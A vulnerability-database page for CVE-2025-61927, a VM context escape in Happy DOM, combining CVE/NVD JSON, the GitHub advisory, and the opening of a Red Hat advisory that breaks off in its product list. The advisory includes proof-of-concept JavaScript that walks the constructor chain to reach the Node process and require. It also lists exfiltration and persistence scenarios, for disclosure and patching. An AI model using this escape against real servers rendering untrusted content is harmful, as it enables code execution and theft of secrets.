Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2025-61927 (GCVE-0-2025-61927)
Vulnerability from cvelistv5 – Published: 2025-10-10 19:38 – Updated: 2025-10-10 19:59
VLAI?
EPSS
Title
Happy-DOM has VM Context Escape
Summary
Happy DOM is a JavaScript implementation of a web browser without its graphical user interface. Happy DOM v19 and lower contains a security vulnerability that puts the owner system at the risk of RCE (Remote Code Execution) attacks. A Node.js VM Context is not an isolated environment, and if the user runs untrusted JavaScript code within the Happy DOM VM Context, it may escape the VM and get access to process level functionality. It seems like what the attacker can get control over depends on if the process is using ESM or CommonJS. With CommonJS the attacker can get hold of the `require()` function to import modules. Happy DOM has JavaScript evaluation enabled by default. This may not be obvious to the consumer of Happy DOM and can potentially put the user at risk if untrusted code is executed within the environment. Version 20.0.0 patches the issue by changing JavaScript evaluation to be disabled by default.
Severity ?
CWE
- CWE-94 - Improper Control of Generation of Code ('Code Injection')
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| capricorn86 | happy-dom |
Affected:
< 20.0.0
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-61927",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-10-10T19:58:56.264973Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-10-10T19:59:09.406Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "happy-dom",
"vendor": "capricorn86",
"versions": [
{
"status": "affected",
"version": "\u003c 20.0.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Happy DOM is a JavaScript implementation of a web browser without its graphical user interface. Happy DOM v19 and lower contains a security vulnerability that puts the owner system at the risk of RCE (Remote Code Execution) attacks. A Node.js VM Context is not an isolated environment, and if the user runs untrusted JavaScript code within the Happy DOM VM Context, it may escape the VM and get access to process level functionality. It seems like what the attacker can get control over depends on if the process is using ESM or CommonJS. With CommonJS the attacker can get hold of the `require()` function to import modules. Happy DOM has JavaScript evaluation enabled by default. This may not be obvious to the consumer of Happy DOM and can potentially put the user at risk if untrusted code is executed within the environment. Version 20.0.0 patches the issue by changing JavaScript evaluation to be disabled by default."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "PRESENT",
"attackVector": "NETWORK",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"privilegesRequired": "HIGH",
"subAvailabilityImpact": "HIGH",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "HIGH",
"userInteraction": "ACTIVE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:L/VI:H/VA:H/SC:H/SI:H/SA:H",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "HIGH"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-94",
"description": "CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-10-10T19:38:19.835Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/capricorn86/happy-dom/security/advisories/GHSA-37j7-fg3j-429f",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/capricorn86/happy-dom/security/advisories/GHSA-37j7-fg3j-429f"
},
{
"name": "https://github.com/capricorn86/happy-dom/commit/819d15ba289495439eda8be360d92a614ce22405",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/capricorn86/happy-dom/commit/819d15ba289495439eda8be360d92a614ce22405"
}
],
"source": {
"advisory": "GHSA-37j7-fg3j-429f",
"discovery": "UNKNOWN"
},
"title": "Happy-DOM has VM Context Escape"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-61927",
"datePublished": "2025-10-10T19:38:19.835Z",
"dateReserved": "2025-10-03T22:21:59.616Z",
"dateUpdated": "2025-10-10T19:59:09.406Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-61927\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-10-10T20:15:38.430\",\"lastModified\":\"2025-10-14T19:36:59.730\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Happy DOM is a JavaScript implementation of a web browser without its graphical user interface. Happy DOM v19 and lower contains a security vulnerability that puts the owner system at the risk of RCE (Remote Code Execution) attacks. A Node.js VM Context is not an isolated environment, and if the user runs untrusted JavaScript code within the Happy DOM VM Context, it may escape the VM and get access to process level functionality. It seems like what the attacker can get control over depends on if the process is using ESM or CommonJS. With CommonJS the attacker can get hold of the `require()` function to import modules. Happy DOM has JavaScript evaluation enabled by default. This may not be obvious to the consumer of Happy DOM and can potentially put the user at risk if untrusted code is executed within the environment. Version 20.0.0 patches the issue by changing JavaScript evaluation to be disabled by default.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:L/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":7.2,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"PRESENT\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"ACTIVE\",\"vulnConfidentialityImpact\":\"LOW\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"HIGH\",\"subIntegrityImpact\":\"HIGH\",\"subAvailabilityImpact\":\"HIGH\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-94\"}]}],\"references\":[{\"url\":\"https://github.com/capricorn86/happy-dom/commit/819d15ba289495439eda8be360d92a614ce22405\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/capricorn86/happy-dom/security/advisories/GHSA-37j7-fg3j-429f\",\"source\":\"security-advisories@github.com\"}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-61927\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-10-10T19:58:56.264973Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-10-10T19:59:02.532Z\"}}], \"cna\": {\"title\": \"Happy-DOM has VM Context Escape\", \"source\": {\"advisory\": \"GHSA-37j7-fg3j-429f\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 7.2, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:L/VI:H/VA:H/SC:H/SI:H/SA:H\", \"userInteraction\": \"ACTIVE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"PRESENT\", \"privilegesRequired\": \"HIGH\", \"subIntegrityImpact\": \"HIGH\", \"vulnIntegrityImpact\": \"HIGH\", \"subAvailabilityImpact\": \"HIGH\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"HIGH\", \"vulnConfidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"capricorn86\", \"product\": \"happy-dom\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 20.0.0\"}]}], \"references\": [{\"url\": \"https://github.com/capricorn86/happy-dom/security/advisories/GHSA-37j7-fg3j-429f\", \"name\": \"https://github.com/capricorn86/happy-dom/security/advisories/GHSA-37j7-fg3j-429f\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/capricorn86/happy-dom/commit/819d15ba289495439eda8be360d92a614ce22405\", \"name\": \"https://github.com/capricorn86/happy-dom/commit/819d15ba289495439eda8be360d92a614ce22405\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Happy DOM is a JavaScript implementation of a web browser without its graphical user interface. Happy DOM v19 and lower contains a security vulnerability that puts the owner system at the risk of RCE (Remote Code Execution) attacks. A Node.js VM Context is not an isolated environment, and if the user runs untrusted JavaScript code within the Happy DOM VM Context, it may escape the VM and get access to process level functionality. It seems like what the attacker can get control over depends on if the process is using ESM or CommonJS. With CommonJS the attacker can get hold of the `require()` function to import modules. Happy DOM has JavaScript evaluation enabled by default. This may not be obvious to the consumer of Happy DOM and can potentially put the user at risk if untrusted code is executed within the environment. Version 20.0.0 patches the issue by changing JavaScript evaluation to be disabled by default.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-94\", \"description\": \"CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-10-10T19:38:19.835Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-61927\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-10-10T19:59:09.406Z\", \"dateReserved\": \"2025-10-03T22:21:59.616Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-10-10T19:38:19.835Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
GHSA-37J7-FG3J-429F
Vulnerability from github – Published: 2025-10-10 23:46 – Updated: 2025-10-13 15:48
VLAI?
Summary
Happy DOM: VM Context Escape can lead to Remote Code Execution
Details
Escape of VM Context gives access to process level functionality
Summary
Happy DOM v19 and lower contains a security vulnerability that puts the owner system at the risk of RCE (Remote Code Execution) attacks.
A Node.js VM Context is not an isolated environment, and if the user runs untrusted JavaScript code within the Happy DOM VM Context, it may escape the VM and get access to process level functionality.
It seems like what the attacker can get control over depends on if the process is using ESM or CommonJS. With CommonJS the attacker can get hold of the require() function to import modules.
Happy DOM has JavaScript evaluation enabled by default. This may not be obvious to the consumer of Happy DOM and can potentially put the user at risk if untrusted code is executed within the environment.
Reproduce
CommonJS (Possible to get hold of require)
const { Window } = require('happy-dom');
const window = new Window({ console });
window.document.write(`
<script>
const process = this.constructor.constructor('return process')();
const require = process.mainModule.require;
console.log('Files:', require('fs').readdirSync('.').slice(0,3));
</script>
`);
ESM (Not possible to get hold of import or require)
const { Window } = require('happy-dom');
const window = new Window({ console });
window.document.write(`
<script>
const process = this.constructor.constructor('return process')();
console.log('PID:', process.pid);
</script>
`);
Potential Impact
Server-Side Rendering (SSR)
const { Window } = require('happy-dom');
const window = new Window();
window.document.innerHTML = userControlledHTML;
Testing Frameworks
Any test suite using Happy-DOM with untrusted content may be at risk
Attack Scenarios
- Data Exfiltration: Access to environment variables, configuration files, secrets
- Lateral Movement: Network access for connecting to internal systems. Happy DOM already gives access to the network by fetch, but has protections in place (such as CORS and header validation etc.).
- Code Execution: Child process access for running arbitrary commands
- Persistence: File system access
Recommended Immediate Actions
- Update Happy DOM to v20 or above
- This version has JavaScript evaluation disabled by default
- This version will output a warning if JavaScript is enabled in an insecure environment
- Run Node.js with the "--disallow-code-generation-from-strings" if you need JavaScript evaluation enabled
- This makes sure that evaluation can't be used at process level to escape the VM
eval()andFunction()can still be used within the Happy DOM VM without any known security risk- Happy DOM v20 and above will output a warning if this flag is not in use
- If you can't update Happy DOM right now, it's recommended to disable JavaScript evaluation, unless you completely trust the content within the environment
Technical Root Cause
All classes and functions inherit from Function. By walking the constructor chain it's possible to get hold of Function at process level. As Function can evaluate code from strings, it's possible to execute code at process level.
Running Node with the "--disallow-code-generation-from-strings" flag protects against this.
Severity ?
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "happy-dom"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "20.0.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-61927"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2025-10-10T23:46:42Z",
"nvd_published_at": "2025-10-10T20:15:38Z",
"severity": "CRITICAL"
},
"details": "# Escape of VM Context gives access to process level functionality\n\n## Summary\nHappy DOM v19 and lower contains a security vulnerability that puts the owner system at the risk of RCE (Remote Code Execution) attacks.\n\nA Node.js VM Context is not an isolated environment, and if the user runs untrusted JavaScript code within the Happy DOM VM Context, it may escape the VM and get access to process level functionality.\n\nIt seems like what the attacker can get control over depends on if the process is using ESM or CommonJS. With CommonJS the attacker can get hold of the `require()` function to import modules.\n\nHappy DOM has JavaScript evaluation enabled by default. This may not be obvious to the consumer of Happy DOM and can potentially put the user at risk if untrusted code is executed within the environment.\n\n## Reproduce\n\n### CommonJS (Possible to get hold of require)\n\n```javascript\nconst { Window } = require(\u0027happy-dom\u0027);\nconst window = new Window({ console });\n\nwindow.document.write(`\n \u003cscript\u003e\n const process = this.constructor.constructor(\u0027return process\u0027)();\n const require = process.mainModule.require;\n \n console.log(\u0027Files:\u0027, require(\u0027fs\u0027).readdirSync(\u0027.\u0027).slice(0,3));\n \u003c/script\u003e\n`);\n```\n### ESM (Not possible to get hold of import or require)\n\n```javascript\nconst { Window } = require(\u0027happy-dom\u0027);\nconst window = new Window({ console });\n\nwindow.document.write(`\n \u003cscript\u003e\n const process = this.constructor.constructor(\u0027return process\u0027)();\n \n console.log(\u0027PID:\u0027, process.pid);\n \u003c/script\u003e\n`);\n```\n\n## Potential Impact\n\n#### Server-Side Rendering (SSR)\n```javascript\nconst { Window } = require(\u0027happy-dom\u0027);\nconst window = new Window();\nwindow.document.innerHTML = userControlledHTML;\n```\n\n#### Testing Frameworks\nAny test suite using Happy-DOM with untrusted content may be at risk\n\n## Attack Scenarios\n\n1. **Data Exfiltration**: Access to environment variables, configuration files, secrets\n2. **Lateral Movement**: Network access for connecting to internal systems. Happy DOM already gives access to the network by fetch, but has protections in place (such as CORS and header validation etc.).\n3. **Code Execution**: Child process access for running arbitrary commands\n4. **Persistence**: File system access\n\n## Recommended Immediate Actions\n\n1. Update Happy DOM to v20 or above\n - This version has JavaScript evaluation disabled by default\n - This version will output a warning if JavaScript is enabled in an insecure environment\n2. Run Node.js with the \"--disallow-code-generation-from-strings\" if you need JavaScript evaluation enabled\n - This makes sure that evaluation can\u0027t be used at process level to escape the VM\n - `eval()` and `Function()` can still be used within the Happy DOM VM without any known security risk\n - Happy DOM v20 and above will output a warning if this flag is not in use\n4. If you can\u0027t update Happy DOM right now, it\u0027s recommended to disable JavaScript evaluation, unless you completely trust the content within the environment\n\n## Technical Root Cause\n\nAll classes and functions inherit from [Function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function). By walking the constructor chain it\u0027s possible to get hold of [Function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function) at process level. As [Function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function) can evaluate code from strings, it\u0027s possible to execute code at process level.\n\nRunning Node with the \"--disallow-code-generation-from-strings\" flag protects against this.",
"id": "GHSA-37j7-fg3j-429f",
"modified": "2025-10-13T15:48:53Z",
"published": "2025-10-10T23:46:42Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/capricorn86/happy-dom/security/advisories/GHSA-37j7-fg3j-429f"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61927"
},
{
"type": "WEB",
"url": "https://github.com/capricorn86/happy-dom/commit/819d15ba289495439eda8be360d92a614ce22405"
},
{
"type": "WEB",
"url": "https://github.com/capricorn86/happy-dom/commit/de438ad72921c69793584aa657b48d3655dfac97"
},
{
"type": "PACKAGE",
"url": "https://github.com/capricorn86/happy-dom"
},
{
"type": "WEB",
"url": "https://github.com/capricorn86/happy-dom/releases/tag/v20.0.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P",
"type": "CVSS_V4"
}
],
"summary": "Happy DOM: VM Context Escape can lead to Remote Code Execution"
}
RHSA-2025:23225
Vulnerability from csaf_redhat - Published: 2025-12-15 21:46 - Updated: 2025-12-19 18:33Summary
Red Hat Security Advisory: Red Hat OpenShift Dev Spaces 3.25.0 Release.
Notes
Topic
Red Hat OpenShift Dev Spaces 3.25.0 has been released.
Details
Red Hat OpenShift Dev Spaces provides a cloud developer workspace server and a browser-based IDE built for teams and organizations. Dev Spaces runs in OpenShift and is well-suited for container-based development.
The 3.25 release is based on Eclipse Che 7.111 and uses the DevWorkspace engine to provide support for workspaces based on devfile v2.1 and v2.2.
Users still using the v1 standard should migrate as soon as possible.
https://devfile.io/docs/2.2.0/migrating-to-devfile-v2
Dev Spaces supports OpenShift EUS releases v4.16 and higher. Users are expected to update to supported OpenShift releases in order to continue to get Dev Spaces updates.
https://access.redhat.com/support/policy/updates/openshift#crw
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Critical"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat OpenShift Dev Spaces 3.25.0 has been released.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat OpenShift Dev Spaces provides a cloud developer workspace server and a browser-based IDE built for teams and organizations. Dev Spaces runs in OpenShift and is well-suited for container-based development.\nThe 3.25 release is based on Eclipse Che 7.111 and uses the DevWorkspace engine to provide support for workspaces based on devfile v2.1 and v2.2.\nUsers still using the v1 standard should migrate as soon as possible.\nhttps://devfile.io/docs/2.2.0/migrating-to-devfile-v2\nDev Spaces supports OpenShift EUS releases v4.16 and higher. Users are expected to update to supported OpenShift releases in order to continue to get Dev Spaces updates.\nhttps://access.redhat.com/support/policy/updates/openshift#crw",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2025:23225",
"url": "https://access.redhat.com/errata/RHSA-2025:23225"
},
{
"category": "external",
"summary": "https://access.redhat.com/documentation/en-us/red_hat_openshift_dev_spaces/3.25/html/administration_guide/installing-devspaces",
"url": "https://access.redhat.com/documentation/en-us/red_hat_openshift_dev_spaces/3.25/html/administration_guide/installing-devspaces"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2024-4067",
"url": "https://access.redhat.com/security/cve/CVE-2024-4067"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-55247",
"url": "https://access.redhat.com/security/cve/CVE-2025-55247"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-55248",
"url": "https://access.redhat.com/security/cve/CVE-2025-55248"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-55315",
"url": "https://access.redhat.com/security/cve/CVE-2025-55315"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-55752",
"url": "https://access.redhat.com/security/cve/CVE-2025-55752"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61927",
"url": "https://access.redhat.com/security/cve/CVE-2025-61927"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-66516",
"url": "https://access.redhat.com/security/cve/CVE-2025-66516"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2025/rhsa-2025_23225.json"
}
],
"title": "Red Hat Security Advisory: Red Hat OpenShift Dev Spaces 3.25.0 Release.",
"tracking": {
"current_release_date": "2025-12-19T18:33:28+00:00",
"generator": {
"date": "2025-12-19T18:33:28+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.6.14"
}
},
"id": "RHSA-2025:23225",
"initial_release_date": "2025-12-15T21:46:21+00:00",
"revision_history": [
{
"date": "2025-12-15T21:46:21+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2025-12-15T21:46:30+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-12-19T18:33:28+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product": {
"name": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.25",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_devspaces:3.25::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Dev Spaces (RHOSDS)"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/code-rhel9@sha256:65b5989d68b4489a7d1b915870afc49c0f977b9690ee958be7e8fedcc611087f_amd64",
"product": {
"name": "registry.redhat.io/devspaces/code-rhel9@sha256:65b5989d68b4489a7d1b915870afc49c0f977b9690ee958be7e8fedcc611087f_amd64",
"product_id": "registry.redhat.io/devspaces/code-rhel9@sha256:65b5989d68b4489a7d1b915870afc49c0f977b9690ee958be7e8fedcc611087f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/code-rhel9@sha256%3A65b5989d68b4489a7d1b915870afc49c0f977b9690ee958be7e8fedcc611087f?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765247843"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e381c47978265d9db3daf279657a63cfe8f1f5afe0d00d4792b819cbae480338_amd64",
"product": {
"name": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e381c47978265d9db3daf279657a63cfe8f1f5afe0d00d4792b819cbae480338_amd64",
"product_id": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e381c47978265d9db3daf279657a63cfe8f1f5afe0d00d4792b819cbae480338_amd64",
"product_identification_helper": {
"purl": "pkg:oci/code-sshd-rhel9@sha256%3Ae381c47978265d9db3daf279657a63cfe8f1f5afe0d00d4792b819cbae480338?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765247198"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:a1ccad11e91784e0b6ed9eb1745d86c8783f1e869096a7f735f47280df0acc4e_amd64",
"product": {
"name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:a1ccad11e91784e0b6ed9eb1745d86c8783f1e869096a7f735f47280df0acc4e_amd64",
"product_id": "registry.redhat.io/devspaces/configbump-rhel9@sha256:a1ccad11e91784e0b6ed9eb1745d86c8783f1e869096a7f735f47280df0acc4e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/configbump-rhel9@sha256%3Aa1ccad11e91784e0b6ed9eb1745d86c8783f1e869096a7f735f47280df0acc4e?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1764892045"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:8cf6cd46eef5fea2e500e14b18a8ec545b5bec93e6fb2289a9d760d56e4b52bb_amd64",
"product": {
"name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:8cf6cd46eef5fea2e500e14b18a8ec545b5bec93e6fb2289a9d760d56e4b52bb_amd64",
"product_id": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:8cf6cd46eef5fea2e500e14b18a8ec545b5bec93e6fb2289a9d760d56e4b52bb_amd64",
"product_identification_helper": {
"purl": "pkg:oci/dashboard-rhel9@sha256%3A8cf6cd46eef5fea2e500e14b18a8ec545b5bec93e6fb2289a9d760d56e4b52bb?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765354572"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:bc65597fade1fd7de78ab27d9b0ba1bf5317b56949a9277e0af4b32db1aaee48_amd64",
"product": {
"name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:bc65597fade1fd7de78ab27d9b0ba1bf5317b56949a9277e0af4b32db1aaee48_amd64",
"product_id": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:bc65597fade1fd7de78ab27d9b0ba1bf5317b56949a9277e0af4b32db1aaee48_amd64",
"product_identification_helper": {
"purl": "pkg:oci/imagepuller-rhel9@sha256%3Abc65597fade1fd7de78ab27d9b0ba1bf5317b56949a9277e0af4b32db1aaee48?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1764892891"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:29fa5d30eafda6658cf2c4a655e82e075b5708ddc1ff1b6d27c082f96c33a95d_amd64",
"product": {
"name": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:29fa5d30eafda6658cf2c4a655e82e075b5708ddc1ff1b6d27c082f96c33a95d_amd64",
"product_id": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:29fa5d30eafda6658cf2c4a655e82e075b5708ddc1ff1b6d27c082f96c33a95d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/jetbrains-ide-rhel9@sha256%3A29fa5d30eafda6658cf2c4a655e82e075b5708ddc1ff1b6d27c082f96c33a95d?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1765246979"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:4ea445ee2670945ac2be3fe503be6f44d4ff4a953deffe9dc61fb4a8a30ae5a8_amd64",
"product": {
"name": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:4ea445ee2670945ac2be3fe503be6f44d4ff4a953deffe9dc61fb4a8a30ae5a8_amd64",
"product_id": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:4ea445ee2670945ac2be3fe503be6f44d4ff4a953deffe9dc61fb4a8a30ae5a8_amd64",
"product_identification_helper": {
"purl": "pkg:oci/machineexec-rhel9@sha256%3A4ea445ee2670945ac2be3fe503be6f44d4ff4a953deffe9dc61fb4a8a30ae5a8?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.25.0-1764891834"
}
}
},
{
"category": "product_version",
